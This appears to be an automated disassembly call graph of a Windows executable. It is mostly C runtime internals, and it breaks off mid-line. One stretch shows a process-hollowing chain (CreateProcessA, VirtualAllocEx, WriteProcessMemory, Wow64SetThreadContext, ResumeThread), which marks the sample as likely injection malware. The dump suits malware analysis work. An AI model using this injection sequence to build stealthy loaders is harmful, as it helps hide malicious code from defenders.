__EH_prolog3_catch _strlen 20776->20778 20797 ff2870 20778->20797 20782 ff1608 Concurrency::details::_ContextCallback::_CallInContext 20782->20764 20783 ff14d0 20801 ff4861 20783->20801 20836 ff52e3 20784->20836 20786 ff1e9e 20840 ff4fbb 20786->20840 20788 ff1ea9 20789 ff4cf8 43 API calls 20788->20789 20790 ff1eb0 20789->20790 20790->20764 20792 fff101 _Fputc 20791->20792 20940 ffe710 20792->20940 20794 fff11b 20795 ffe35b _Fputc 41 API calls 20794->20795 20796 fff128 20795->20796 20796->20764 20799 ff287f 20797->20799 20798 ff289d 20798->20783 20799->20798 20812 ff4cf8 20799->20812 20802 ff1600 20801->20802 20806 ff4878 std::ios_base::_Init 20801->20806 20808 ff2c35 20802->20808 20803 ff48b1 20804 ffb012 Concurrency::cancel_current_task RaiseException 20803->20804 20805 ff48ca 20804->20805 20806->20803 20820 ff2746 20806->20820 20809 ff2c3d 20808->20809 20810 ff2b8c 20809->20810 20832 ff3f4b 20809->20832 20810->20782 20813 ff4d04 __EH_prolog3_catch 20812->20813 20814 ff4da9 Concurrency::details::_ContextCallback::_CallInContext 20813->20814 20815 ff2870 43 API calls 20813->20815 20814->20798 20818 ff4d23 20815->20818 20816 ff4da1 20817 ff2c35 43 API calls 20816->20817 20817->20814 20818->20816 20819 ff4861 std::ios_base::_Init 43 API calls 20818->20819 20819->20816 20823 ff28ec 20820->20823 20824 ff2241 std::_Throw_Cpp_error 43 API calls 20823->20824 20825 ff290b 20824->20825 20826 ff24ce std::_Throw_Cpp_error 43 API calls 20825->20826 20827 ff291c 20826->20827 20828 ff4623 std::_Throw_Cpp_error 41 API calls 20827->20828 20829 ff2924 20828->20829 20830 ff9ffe __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20829->20830 20831 ff275b 20830->20831 20831->20803 20834 ff3f57 __EH_prolog3_catch 20832->20834 20833 ff3f93 Concurrency::details::_ContextCallback::_CallInContext 20833->20810 20834->20833 20835 ff4861 std::ios_base::_Init 43 API calls 20834->20835 20835->20833 20837 ff52f7 20836->20837 20848 ff1f58 20837->20848 20839 ff5300 std::ios_base::_Ios_base_dtor 20839->20786 20841 ff4fc7 __EH_prolog3_catch 20840->20841 20842 ff2870 43 API calls 20841->20842 20843 ff4fd9 20842->20843 20844 ff4861 std::ios_base::_Init 43 API calls 20843->20844 20845 ff5064 20844->20845 20846 ff2c35 43 API calls 20845->20846 20847 ff506c Concurrency::details::_ContextCallback::_CallInContext 20846->20847 20847->20788 20863 ff5494 20848->20863 20852 ff1f8f 20888 ff54ec 20852->20888 20853 ff1f7c 20853->20852 20875 ff3c13 20853->20875 20855 ff1fc5 20855->20839 20858 ff1fcb 20895 ff4548 20858->20895 20859 ff1fa6 20885 ff6693 20859->20885 20864 ff54aa 20863->20864 20865 ff54a3 20863->20865 20868 ff1f69 20864->20868 20904 ff9531 EnterCriticalSection 20864->20904 20899 1000f2b 20865->20899 20869 ff2d36 20868->20869 20870 ff2d66 20869->20870 20871 ff2d42 20869->20871 20870->20853 20872 ff5494 std::_Lockit::_Lockit 7 API calls 20871->20872 20873 ff2d4c 20872->20873 20874 ff54ec std::_Lockit::~_Lockit 2 API calls 20873->20874 20874->20870 20876 ff1f9f 20875->20876 20877 ff3c27 20875->20877 20876->20858 20876->20859 20877->20876 20878 ff9cb4 codecvt 16 API calls 20877->20878 20879 ff3c33 codecvt 20878->20879 20884 ff3c54 20879->20884 20905 ff23ba 20879->20905 20884->20876 20917 ff2b0f 20884->20917 20886 ff9cb4 codecvt 16 API calls 20885->20886 20887 ff669e 20886->20887 20887->20852 20889 1000f39 20888->20889 20890 ff54f6 20888->20890 20939 1000f14 LeaveCriticalSection 20889->20939 20894 ff5509 20890->20894 20938 ff953f LeaveCriticalSection 20890->20938 20893 1000f40 20893->20855 20894->20855 20896 ff4556 codecvt 20895->20896 20897 ffb012 Concurrency::cancel_current_task RaiseException 20896->20897 20898 ff4564 20897->20898 20900 1007c11 std::_Lockit::_Lockit 5 API calls 20899->20900 20901 1000f30 20900->20901 20902 1000ecc std::_Lockit::_Lockit EnterCriticalSection 20901->20902 20903 1000f37 20902->20903 20903->20868 20904->20868 20906 ff5494 std::_Lockit::_Lockit 7 API calls 20905->20906 20907 ff23c6 20906->20907 20908 ff2407 20907->20908 20909 ff23f4 20907->20909 20911 ff560b codecvt 43 API calls 20908->20911 20910 ff67c3 std::_Locinfo::_Locinfo_ctor 69 API calls 20909->20910 20912 ff23fe 20910->20912 20913 ff2411 20911->20913 20914 ff229a 20912->20914 20915 ff68d8 __Getctype 42 API calls 20914->20915 20916 ff22ba 20915->20916 20916->20884 20918 ff680e std::_Locinfo::_Locinfo_dtor 68 API calls 20917->20918 20919 ff2b19 20918->20919 20920 ff2b28 20919->20920 20921 ffe680 __freea 14 API calls 20919->20921 20922 ff2b3b 20920->20922 20924 ffe680 __freea 14 API calls 20920->20924 20921->20920 20923 ff2b4c 20922->20923 20925 ffe680 __freea 14 API calls 20922->20925 20926 ff2b5d 20923->20926 20927 ffe680 __freea 14 API calls 20923->20927 20924->20922 20925->20923 20928 ff2b6e 20926->20928 20929 ffe680 __freea 14 API calls 20926->20929 20927->20926 20930 ff2b7f 20928->20930 20931 ffe680 __freea 14 API calls 20928->20931 20929->20928 20932 1000f39 20930->20932 20933 ff54f6 20930->20933 20931->20930 20935 1000f14 std::_Lockit::~_Lockit LeaveCriticalSection 20932->20935 20934 ff5509 20933->20934 20936 ff953f std::_Lockit::~_Lockit LeaveCriticalSection 20933->20936 20934->20876 20937 1000f40 20935->20937 20936->20934 20937->20876 20938->20894 20939->20893 20954 fff01b 20940->20954 20942 ffe76a 20948 ffe78e 20942->20948 20961 ffefc0 20942->20961 20943 ffe737 20945 ffe5a2 _Fputc 41 API calls 20943->20945 20944 ffe722 20944->20942 20944->20943 20953 ffe752 std::_Locinfo::_Locinfo_ctor 20944->20953 20945->20953 20950 ffe7b2 20948->20950 20968 fff058 20948->20968 20949 ffe83a 20951 ffef61 41 API calls 20949->20951 20950->20949 20975 ffef61 20950->20975 20951->20953 20953->20794 20955 fff033 20954->20955 20956 fff020 20954->20956 20955->20944 20957 1001a7e __strnicoll 14 API calls 20956->20957 20958 fff025 20957->20958 20959 ffe61f __strnicoll 41 API calls 20958->20959 20960 fff030 20959->20960 20960->20944 20981 ffe406 20961->20981 20969 fff064 20968->20969 20972 fff07a 20968->20972 21000 1001374 20969->21000 20971 fff08a 20971->20948 20972->20971 21005 1007324 20972->21005 20973 fff06f std::_Locinfo::_Locinfo_ctor 20973->20948 20976 ffef86 20975->20976 20977 ffef72 20975->20977 20976->20949 20977->20976 20978 1001a7e __strnicoll 14 API calls 20977->20978 20979 ffef7b 20978->20979 20980 ffe61f __strnicoll 41 API calls 20979->20980 20980->20976 20982 ffe419 20981->20982 20983 ffe410 20981->20983 20988 100741c 20982->20988 20996 ffe3c0 GetLastError 20983->20996 20985 ffe415 20985->20982 20986 ffe69b __purecall 41 API calls 20985->20986 20987 ffe422 20986->20987 20989 1007433 20988->20989 20991 ffefed 20988->20991 20990 100f967 __Getctype 41 API calls 20989->20990 20989->20991 20990->20991 20992 100747a 20991->20992 20993 1007491 20992->20993 20994 ffeffa 20992->20994 20993->20994 20995 100e04a __strnicoll 41 API calls 20993->20995 20994->20948 20995->20994 20997 ffe3d9 20996->20997 20998 1006e92 _Fputc 14 API calls 20997->20998 20999 ffe3f1 SetLastError 20998->20999 20999->20985 21001 1006c90 _unexpected 41 API calls 21000->21001 21002 100137f 21001->21002 21003 10073ef __Getctype 41 API calls 21002->21003 21004 100138f 21003->21004 21004->20973 21006 10034ad __strnicoll 41 API calls 21005->21006 21007 1007341 21006->21007 21008 1009ce9 std::_Locinfo::_Locinfo_ctor 44 API calls 21007->21008 21009 1007351 21007->21009 21008->21009 21010 ff9ffe __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 21009->21010 21011 10073ed 21010->21011 21011->20971 21013 ff545c 21012->21013 21016 ff535d 21013->21016 21017 ff5372 21016->21017 21020 1000d57 21017->21020 21021 1000d6b _Fputc 21020->21021 21022 1000d8d 21021->21022 21023 1000db4 21021->21023 21024 ffe5a2 _Fputc 41 API calls 21022->21024 21029 fff2bf 21023->21029 21025 1000da8 21024->21025 21027 ffe35b _Fputc 41 API calls 21025->21027 21028 ff233d 21027->21028 21028->20749 21030 fff2cb __FrameHandler3::FrameUnwindToState 21029->21030 21037 fff297 EnterCriticalSection 21030->21037 21032 fff2d9 21038 fffe3f 21032->21038 21037->21032 21039 1008e8c 42 API calls 21038->21039 21040 fffe66 21039->21040 21041 100004a 46 API calls 21040->21041 21042 fffead 21041->21042 21043 fffe01 14 API calls 21042->21043 21044 fffeba 21043->21044 21045 1008f38 66 API calls 21044->21045 21046 fffec7 21045->21046 21047 ff9ffe __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 21046->21047 21048 fff2e6 21047->21048 21049 fff30e 21048->21049 21050 fff2ab _Ungetc LeaveCriticalSection 21049->21050 21051 fff2f7 21050->21051 21051->21025 21062 ff1936 21052->21062 21054 ff32bd 21065 ff1b26 21054->21065 21056 ff32c9 21058 ff9ffe __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 21056->21058 21060 ff32db CreateThread WaitForSingleObjectEx 21058->21060 21059 ff31db 21059->21054 21068 ff1615 21059->21068 21078 ff1eb4 21059->21078 21060->20736 21063 ff9cb4 codecvt 16 API calls 21062->21063 21064 ff193d 21063->21064 21064->21059 21085 ff1b46 21065->21085 21067 ff1b37 _Deallocate 21067->21056 21069 ff1621 __EH_prolog3_catch _strlen 21068->21069 21070 ff2870 43 API calls 21069->21070 21071 ff1685 21070->21071 21077 ff168a std::ios_base::_Ios_base_dtor 21071->21077 21093 ff1fd1 21071->21093 21072 ff4861 std::ios_base::_Init 43 API calls 21073 ff185a 21072->21073 21075 ff2c35 43 API calls 21073->21075 21076 ff1862 Concurrency::details::_ContextCallback::_CallInContext 21075->21076 21076->21059 21077->21072 21145 ff531c 21078->21145 21080 ff1ec7 21149 ff507b 21080->21149 21082 ff1ed2 21083 ff4cf8 43 API calls 21082->21083 21084 ff1ed9 21083->21084 21084->21059 21087 ff1b50 21085->21087 21086 ff1b72 21086->21067 21087->21086 21088 ff1b46 41 API calls 21087->21088 21090 ff1b77 21087->21090 21088->21087 21091 ff4623 std::_Throw_Cpp_error 41 API calls 21090->21091 21092 ff1b84 _Deallocate 21091->21092 21092->21087 21094 ff5494 std::_Lockit::_Lockit 7 API calls 21093->21094 21095 ff1fe2 21094->21095 21096 ff2d36 int 9 API calls 21095->21096 21097 ff1ff5 21096->21097 21098 ff2008 21097->21098 21108 ff3c70 21097->21108 21099 ff54ec std::_Lockit::~_Lockit 2 API calls 21098->21099 21101 ff203e 21099->21101 21101->21077 21103 ff201f 21105 ff6693 std::_Facet_Register 16 API calls 21103->21105 21104 ff2044 21106 ff4548 RaiseException 21104->21106 21105->21098 21107 ff2049 21106->21107 21109 ff2018 21108->21109 21110 ff3c84 21108->21110 21109->21103 21109->21104 21110->21109 21111 ff9cb4 codecvt 16 API calls 21110->21111 21113 ff3c90 codecvt 21111->21113 21112 ff3cb9 21112->21109 21114 ff2b0f std::_Locinfo::~_Locinfo 69 API calls 21112->21114 21113->21112 21115 ff23ba codecvt 71 API calls 21113->21115 21114->21109 21116 ff3ca8 21115->21116 21118 ff3d96 21116->21118 21123 ff68d8 21118->21123 21124 10014b4 __Getctype 41 API calls 21123->21124 21125 ff68e1 __Getctype 21124->21125 21126 ff68fb 21125->21126 21127 ff6919 21125->21127 21128 1001374 __Getctype 41 API calls 21126->21128 21129 1001374 __Getctype 41 API calls 21127->21129 21130 ff6902 21128->21130 21129->21130 21131 10014d9 __Getctype 41 API calls 21130->21131 21132 ff692a 21131->21132 21133 ff3daa 21132->21133 21134 1001982 __Getctype 42 API calls 21132->21134 21135 ff6a4f 21133->21135 21134->21133 21136 ff6a62 __fread_nolock 21135->21136 21137 10014b4 __Getctype 41 API calls 21136->21137 21138 ff6a6a 21137->21138 21139 1001500 ctype 41 API calls 21138->21139 21140 ff6a71 21139->21140 21141 10014d9 __Getctype 41 API calls 21140->21141 21142 ff6a79 21141->21142 21143 1001374 __Getctype 41 API calls 21142->21143 21144 ff3dbc 21142->21144 21143->21144 21144->21112 21146 ff5330 21145->21146 21147 ff1fd1 72 API calls 21146->21147 21148 ff5339 std::ios_base::_Ios_base_dtor 21147->21148 21148->21080 21150 ff5087 __EH_prolog3_catch 21149->21150 21151 ff2870 43 API calls 21150->21151 21152 ff5099 21151->21152 21153 ff4861 std::ios_base::_Init 43 API calls 21152->21153 21154 ff512c 21153->21154 21155 ff2c35 43 API calls 21154->21155 21156 ff5134 Concurrency::details::_ContextCallback::_CallInContext 21155->21156 21156->21082 19237 fc018d 19238 fc01c5 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 19237->19238 19240 fc03a2 WriteProcessMemory 19238->19240 19241 fc03e7 19240->19241 19242 fc03ec WriteProcessMemory 19241->19242 19243 fc0429 WriteProcessMemory Wow64SetThreadContext ResumeThread 19241->19243 19242->19241 19244 ff9b28 19245 ff9b34 __FrameHandler3::FrameUnwindToState 19244->19245 19270 ff9d6d 19245->19270 19247 ff9c94 19319 ffa52a IsProcessorFeaturePresent 19247->19319 19249 ff9c9b 19299 1004ab7 19249->19299 19250 ff9b3b 19250->19247 19257 ff9b65 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock __purecall 19250->19257 19255 ff9b84 19256 ff9c05 19278 10046f5 19256->19278 19257->19255 19257->19256 19302 1004a91 19257->19302 19260 ff9c0b 19282 ff5380 GetModuleHandleA 19260->19282 19265 ff9c30 19266 ff9c39 19265->19266 19310 1004a6c 19265->19310 19313 ff9ede 19266->19313 19271 ff9d76 19270->19271 19326 ffa215 IsProcessorFeaturePresent 19271->19326 19275 ff9d87 19276 ff9d8b 19275->19276 19336 ffcf9d 19275->19336 19276->19250 19279 1004703 19278->19279 19280 10046fe 19278->19280 19279->19260 19396 100444f 19280->19396 20049 ff2241 19282->20049 19284 ff53ac _strlen 20053 ff4808 19284->20053 19286 ff53c2 _strlen 19287 ff4808 std::_Throw_Cpp_error 43 API calls 19286->19287 19288 ff53d8 GetProcAddress 19287->19288 19289 ff53f3 RegEnableReflectionKey 19288->19289 20057 ff1d5f 19289->20057 19293 ff5414 DeleteAce 19294 ff5423 19293->19294 20063 ff4623 19294->20063 19297 ff9ffe __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 19298 ff5448 19297->19298 19308 ffa644 GetModuleHandleW 19298->19308 20480 100489f 19299->20480 19303 1004aa7 __FrameHandler3::FrameUnwindToState std::_Lockit::_Lockit 19302->19303 19303->19256 19304 1006c90 _unexpected 41 API calls 19303->19304 19305 1006818 19304->19305 19306 ffe69b __purecall 41 API calls 19305->19306 19307 1006842 19306->19307 19309 ff9c2c 19308->19309 19309->19249 19309->19265 19311 100489f __purecall 23 API calls 19310->19311 19312 1004a77 19311->19312 19312->19266 19314 ff9eea 19313->19314 19315 ff9c42 19314->19315 20557 1006778 19314->20557 19315->19255 19317 ff9ef8 19318 ffcf9d ___scrt_uninitialize_crt 7 API calls 19317->19318 19318->19315 19320 ffa540 __fread_nolock __purecall 19319->19320 19321 ffa5eb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19320->19321 19322 ffa62f __purecall 19321->19322 19322->19249 19323 1004a7b 19324 100489f __purecall 23 API calls 19323->19324 19325 ff9ca9 19324->19325 19327 ff9d82 19326->19327 19328 ffcf7e 19327->19328 19342 ffe007 19328->19342 19332 ffcf8f 19333 ffcf9a 19332->19333 19356 ffe043 19332->19356 19333->19275 19335 ffcf87 19335->19275 19337 ffcfa6 19336->19337 19338 ffcfb0 19336->19338 19339 ffd116 ___vcrt_uninitialize_ptd 6 API calls 19337->19339 19338->19276 19340 ffcfab 19339->19340 19341 ffe043 ___vcrt_uninitialize_locks DeleteCriticalSection 19340->19341 19341->19338 19345 ffe010 19342->19345 19344 ffe039 19347 ffe043 ___vcrt_uninitialize_locks DeleteCriticalSection 19344->19347 19345->19344 19346 ffcf83 19345->19346 19360 ffe24c 19345->19360 19346->19335 19348 ffd0e3 19346->19348 19347->19346 19377 ffe15d 19348->19377 19351 ffd0f8 19351->19332 19354 ffd113 19354->19332 19357 ffe06d 19356->19357 19358 ffe04e 19356->19358 19357->19335 19359 ffe058 DeleteCriticalSection 19358->19359 19359->19357 19359->19359 19365 ffe072 19360->19365 19363 ffe284 InitializeCriticalSectionAndSpinCount 19364 ffe26f 19363->19364 19364->19345 19366 ffe08f 19365->19366 19369 ffe093 19365->19369 19366->19363 19366->19364 19367 ffe0fb GetProcAddress 19367->19366 19369->19366 19369->19367 19370 ffe0ec 19369->19370 19372 ffe112 LoadLibraryExW 19369->19372 19370->19367 19371 ffe0f4 FreeLibrary 19370->19371 19371->19367 19373 ffe159 19372->19373 19374 ffe129 GetLastError 19372->19374 19373->19369 19374->19373 19375 ffe134 ___vcrt_InitializeCriticalSectionEx 19374->19375 19375->19373 19376 ffe14a LoadLibraryExW 19375->19376 19376->19369 19378 ffe072 ___vcrt_InitializeCriticalSectionEx 5 API calls 19377->19378 19379 ffe177 19378->19379 19380 ffe190 TlsAlloc 19379->19380 19381 ffd0ed 19379->19381 19381->19351 19382 ffe20e 19381->19382 19383 ffe072 ___vcrt_InitializeCriticalSectionEx 5 API calls 19382->19383 19384 ffe228 19383->19384 19385 ffe243 TlsSetValue 19384->19385 19386 ffd106 19384->19386 19385->19386 19386->19354 19387 ffd116 19386->19387 19388 ffd126 19387->19388 19389 ffd120 19387->19389 19388->19351 19391 ffe198 19389->19391 19392 ffe072 ___vcrt_InitializeCriticalSectionEx 5 API calls 19391->19392 19393 ffe1b2 19392->19393 19394 ffe1ca TlsFree 19393->19394 19395 ffe1be 19393->19395 19394->19395 19395->19388 19397 1004458 19396->19397 19400 100446e 19396->19400 19397->19400 19402 100447b 19397->19402 19399 1004465 19399->19400 19419 10045e6 19399->19419 19400->19279 19403 1004484 19402->19403 19404 1004487 19402->19404 19403->19399 19427 100e002 19404->19427 19409 10044a4 19460 10044d5 19409->19460 19410 1004498 19454 1006f7b 19410->19454 19415 1006f7b ___free_lconv_mon 14 API calls 19416 10044c8 19415->19416 19417 1006f7b ___free_lconv_mon 14 API calls 19416->19417 19418 10044ce 19417->19418 19418->19399 19420 1004657 19419->19420 19425 10045f5 19419->19425 19420->19400 19421 10074ab _unexpected 14 API calls 19421->19425 19422 100465b 19423 1006f7b ___free_lconv_mon 14 API calls 19422->19423 19423->19420 19424 100cf52 WideCharToMultiByte _Fputc 19424->19425 19425->19420 19425->19421 19425->19422 19425->19424 19426 1006f7b ___free_lconv_mon 14 API calls 19425->19426 19426->19425 19428 100e00b 19427->19428 19432 100448d 19427->19432 19482 1006d4b 19428->19482 19433 100e304 GetEnvironmentStringsW 19432->19433 19434 1004492 19433->19434 19435 100e31c 19433->19435 19434->19409 19434->19410 19436 100cf52 _Fputc WideCharToMultiByte 19435->19436 19437 100e339 19436->19437 19438 100e343 FreeEnvironmentStringsW 19437->19438 19439 100e34e 19437->19439 19438->19434 19440 1007f6f __strnicoll 15 API calls 19439->19440 19441 100e355 19440->19441 19442 100e35d 19441->19442 19443 100e36e 19441->19443 19444 1006f7b ___free_lconv_mon 14 API calls 19442->19444 19445 100cf52 _Fputc WideCharToMultiByte 19443->19445 19446 100e362 FreeEnvironmentStringsW 19444->19446 19447 100e37e 19445->19447 19446->19434 19448 100e385 19447->19448 19449 100e38d 19447->19449 19451 1006f7b ___free_lconv_mon 14 API calls 19448->19451 19450 1006f7b ___free_lconv_mon 14 API calls 19449->19450 19452 100e38b FreeEnvironmentStringsW 19450->19452 19451->19452 19452->19434 19455 1006f86 HeapFree 19454->19455 19459 100449e 19454->19459 19456 1006f9b GetLastError 19455->19456 19455->19459 19457 1006fa8 __dosmaperr 19456->19457 19458 1001a7e __strnicoll 12 API calls 19457->19458 19458->19459 19459->19399 19461 10044ea 19460->19461 19462 10074ab _unexpected 14 API calls 19461->19462 19463 1004511 19462->19463 19464 1004519 19463->19464 19473 1004523 19463->19473 19465 1006f7b ___free_lconv_mon 14 API calls 19464->19465 19481 10044ab 19465->19481 19466 1004580 19467 1006f7b ___free_lconv_mon 14 API calls 19466->19467 19467->19481 19468 10074ab _unexpected 14 API calls 19468->19473 19469 100458f 20039 10045b7 19469->20039 19473->19466 19473->19468 19473->19469 19475 10045aa 19473->19475 19477 1006f7b ___free_lconv_mon 14 API calls 19473->19477 20030 1006843 19473->20030 19474 1006f7b ___free_lconv_mon 14 API calls 19476 100459c 19474->19476 20045 ffe64c IsProcessorFeaturePresent 19475->20045 19479 1006f7b ___free_lconv_mon 14 API calls 19476->19479 19477->19473 19479->19481 19480 10045b6 19481->19415 19483 1006d56 19482->19483 19484 1006d5c 19482->19484 19530 10079ba 19483->19530 19505 1006d62 19484->19505 19535 10079f9 19484->19535 19490 1006d67 19507 100de0d 19490->19507 19491 1006d86 19493 1006da3 19491->19493 19494 1006d8e 19491->19494 19496 10079f9 _unexpected 6 API calls 19493->19496 19495 10079f9 _unexpected 6 API calls 19494->19495 19497 1006d9a 19495->19497 19498 1006daf 19496->19498 19502 1006f7b ___free_lconv_mon 14 API calls 19497->19502 19499 1006dc2 19498->19499 19500 1006db3 19498->19500 19547 1006abe 19499->19547 19503 10079f9 _unexpected 6 API calls 19500->19503 19502->19505 19503->19497 19505->19490 19552 ffe69b 19505->19552 19506 1006f7b ___free_lconv_mon 14 API calls 19506->19490 19835 100df62 19507->19835 19513 100de61 19514 100de77 19513->19514 19515 100de69 19513->19515 19860 100e05d 19514->19860 19516 1006f7b ___free_lconv_mon 14 API calls 19515->19516 19519 100de50 19516->19519 19519->19432 19520 100deaf 19521 1001a7e __strnicoll 14 API calls 19520->19521 19522 100deb4 19521->19522 19524 1006f7b ___free_lconv_mon 14 API calls 19522->19524 19523 100def6 19526 100df3f 19523->19526 19871 100da7f 19523->19871 19524->19519 19525 100deca 19525->19523 19529 1006f7b ___free_lconv_mon 14 API calls 19525->19529 19528 1006f7b ___free_lconv_mon 14 API calls 19526->19528 19528->19519 19529->19523 19563 10077a9 19530->19563 19533 10079f1 TlsGetValue 19534 10079df 19534->19484 19536 10077a9 std::_Lockit::_Lockit 5 API calls 19535->19536 19537 1007a15 19536->19537 19538 1007a33 TlsSetValue 19537->19538 19539 1006d76 19537->19539 19539->19505 19540 10074ab 19539->19540 19545 10074b8 _unexpected 19540->19545 19541 10074f8 19581 1001a7e 19541->19581 19542 10074e3 HeapAlloc 19543 10074f6 19542->19543 19542->19545 19543->19491 19545->19541 19545->19542 19578 10062a0 19545->19578 19618 1006952 19547->19618 19720 1007083 19552->19720 19555 ffe6ab 19557 ffe6d4 19555->19557 19558 ffe6b5 IsProcessorFeaturePresent 19555->19558 19560 1004a7b __purecall 23 API calls 19557->19560 19559 ffe6c1 19558->19559 19750 ffe423 19559->19750 19562 ffe6de 19560->19562 19564 10077d7 19563->19564 19568 10077d3 19563->19568 19564->19568 19570 10076de 19564->19570 19567 10077f1 GetProcAddress 19567->19568 19569 1007801 std::_Lockit::_Lockit 19567->19569 19568->19533 19568->19534 19569->19568 19576 10076ef ___vcrt_InitializeCriticalSectionEx 19570->19576 19571 1007785 19571->19567 19571->19568 19572 100770d LoadLibraryExW 19573 1007728 GetLastError 19572->19573 19574 100778c 19572->19574 19573->19576 19574->19571 19575 100779e FreeLibrary 19574->19575 19575->19571 19576->19571 19576->19572 19577 100775b LoadLibraryExW 19576->19577 19577->19574 19577->19576 19584 10062cd 19578->19584 19595 1006de1 GetLastError 19581->19595 19583 1001a83 19583->19543 19585 10062d9 __FrameHandler3::FrameUnwindToState 19584->19585 19590 1000ecc EnterCriticalSection 19585->19590 19587 10062e4 19591 1006320 19587->19591 19590->19587 19594 1000f14 LeaveCriticalSection 19591->19594 19593 10062ab 19593->19545 19594->19593 19596 1006dfd 19595->19596 19597 1006df7 19595->19597 19598 10079f9 _unexpected 6 API calls 19596->19598 19601 1006e01 SetLastError 19596->19601 19599 10079ba _unexpected 6 API calls 19597->19599 19600 1006e19 19598->19600 19599->19596 19600->19601 19603 10074ab _unexpected 12 API calls 19600->19603 19601->19583 19604 1006e2e 19603->19604 19605 1006e36 19604->19605 19606 1006e47 19604->19606 19607 10079f9 _unexpected 6 API calls 19605->19607 19608 10079f9 _unexpected 6 API calls 19606->19608 19609 1006e44 19607->19609 19610 1006e53 19608->19610 19614 1006f7b ___free_lconv_mon 12 API calls 19609->19614 19611 1006e57 19610->19611 19612 1006e6e 19610->19612 19613 10079f9 _unexpected 6 API calls 19611->19613 19615 1006abe _unexpected 12 API calls 19612->19615 19613->19609 19614->19601 19616 1006e79 19615->19616 19617 1006f7b ___free_lconv_mon 12 API calls 19616->19617 19617->19601 19619 100695e __FrameHandler3::FrameUnwindToState 19618->19619 19632 1000ecc EnterCriticalSection 19619->19632 19621 1006968 19633 1006998 19621->19633 19624 1006a64 19625 1006a70 __FrameHandler3::FrameUnwindToState 19624->19625 19637 1000ecc EnterCriticalSection 19625->19637 19627 1006a7a 19638 1006c45 19627->19638 19629 1006a92 19642 1006ab2 19629->19642 19632->19621 19636 1000f14 LeaveCriticalSection 19633->19636 19635 1006986 19635->19624 19636->19635 19637->19627 19639 1006c7b __Getctype 19638->19639 19640 1006c54 __Getctype 19638->19640 19639->19629 19640->19639 19645 100f71b 19640->19645 19719 1000f14 LeaveCriticalSection 19642->19719 19644 1006aa0 19644->19506 19646 100f731 19645->19646 19647 100f79b 19645->19647 19646->19647 19650 100f764 19646->19650 19654 1006f7b ___free_lconv_mon 14 API calls 19646->19654 19649 1006f7b ___free_lconv_mon 14 API calls 19647->19649 19672 100f7e9 19647->19672 19651 100f7bd 19649->19651 19652 100f786 19650->19652 19660 1006f7b ___free_lconv_mon 14 API calls 19650->19660 19653 1006f7b ___free_lconv_mon 14 API calls 19651->19653 19656 1006f7b ___free_lconv_mon 14 API calls 19652->19656 19655 100f7d0 19653->19655 19659 100f759 19654->19659 19661 1006f7b ___free_lconv_mon 14 API calls 19655->19661 19657 100f790 19656->19657 19662 1006f7b ___free_lconv_mon 14 API calls 19657->19662 19658 100f857 19663 1006f7b ___free_lconv_mon 14 API calls 19658->19663 19673 100e9d1 19659->19673 19665 100f77b 19660->19665 19666 100f7de 19661->19666 19662->19647 19667 100f85d 19663->19667 19701 100ee85 19665->19701 19670 1006f7b ___free_lconv_mon 14 API calls 19666->19670 19667->19639 19668 100f7f7 19668->19658 19671 1006f7b 14 API calls ___free_lconv_mon 19668->19671 19670->19672 19671->19668 19713 100f88c 19672->19713 19674 100e9e2 19673->19674 19675 100eacb 19673->19675 19676 100e9f3 19674->19676 19678 1006f7b ___free_lconv_mon 14 API calls 19674->19678 19675->19650 19677 100ea05 19676->19677 19679 1006f7b ___free_lconv_mon 14 API calls 19676->19679 19680 100ea17 19677->19680 19681 1006f7b ___free_lconv_mon 14 API calls 19677->19681 19678->19676 19679->19677 19682 100ea29 19680->19682 19683 1006f7b ___free_lconv_mon 14 API calls 19680->19683 19681->19680 19684 100ea3b 19682->19684 19686 1006f7b ___free_lconv_mon 14 API calls 19682->19686 19683->19682 19685 100ea4d 19684->19685 19687 1006f7b ___free_lconv_mon 14 API calls 19684->19687 19688 100ea5f 19685->19688 19689 1006f7b ___free_lconv_mon 14 API calls 19685->19689 19686->19684 19687->19685 19690 100ea71 19688->19690 19691 1006f7b ___free_lconv_mon 14 API calls 19688->19691 19689->19688 19692 100ea83 19690->19692 19694 1006f7b ___free_lconv_mon 14 API calls 19690->19694 19691->19690 19693 100ea95 19692->19693 19695 1006f7b ___free_lconv_mon 14 API calls 19692->19695 19696 100eaa7 19693->19696 19697 1006f7b ___free_lconv_mon 14 API calls 19693->19697 19694->19692 19695->19693 19698 100eab9 19696->19698 19699 1006f7b ___free_lconv_mon 14 API calls 19696->19699 19697->19696 19698->19675 19700 1006f7b ___free_lconv_mon 14 API calls 19698->19700 19699->19698 19700->19675 19702 100ee92 19701->19702 19712 100eeea 19701->19712 19703 100eea2 19702->19703 19704 1006f7b ___free_lconv_mon 14 API calls 19702->19704 19705 100eeb4 19703->19705 19706 1006f7b ___free_lconv_mon 14 API calls 19703->19706 19704->19703 19707 100eec6 19705->19707 19708 1006f7b ___free_lconv_mon 14 API calls 19705->19708 19706->19705 19709 100eed8 19707->19709 19710 1006f7b ___free_lconv_mon 14 API calls 19707->19710 19708->19707 19711 1006f7b ___free_lconv_mon 14 API calls 19709->19711 19709->19712 19710->19709 19711->19712 19712->19652 19714 100f899 19713->19714 19718 100f8b8 19713->19718 19715 100f3a0 __Getctype 14 API calls 19714->19715 19714->19718 19716 100f8b2 19715->19716 19717 1006f7b ___free_lconv_mon 14 API calls 19716->19717 19717->19718 19718->19668 19719->19644 19756 1006fb5 19720->19756 19723 10070c8 19724 10070d4 __FrameHandler3::FrameUnwindToState 19723->19724 19725 1006de1 __dosmaperr 14 API calls 19724->19725 19729 1007101 __purecall 19724->19729 19732 10070fb __purecall 19724->19732 19725->19732 19726 1007148 19727 1001a7e __strnicoll 14 API calls 19726->19727 19728 100714d 19727->19728 19767 ffe61f 19728->19767 19731 1007174 19729->19731 19770 1000ecc EnterCriticalSection 19729->19770 19736 10072a7 19731->19736 19738 10071b6 19731->19738 19747 10071e5 19731->19747 19732->19726 19732->19729 19733 1007132 19732->19733 19733->19555 19742 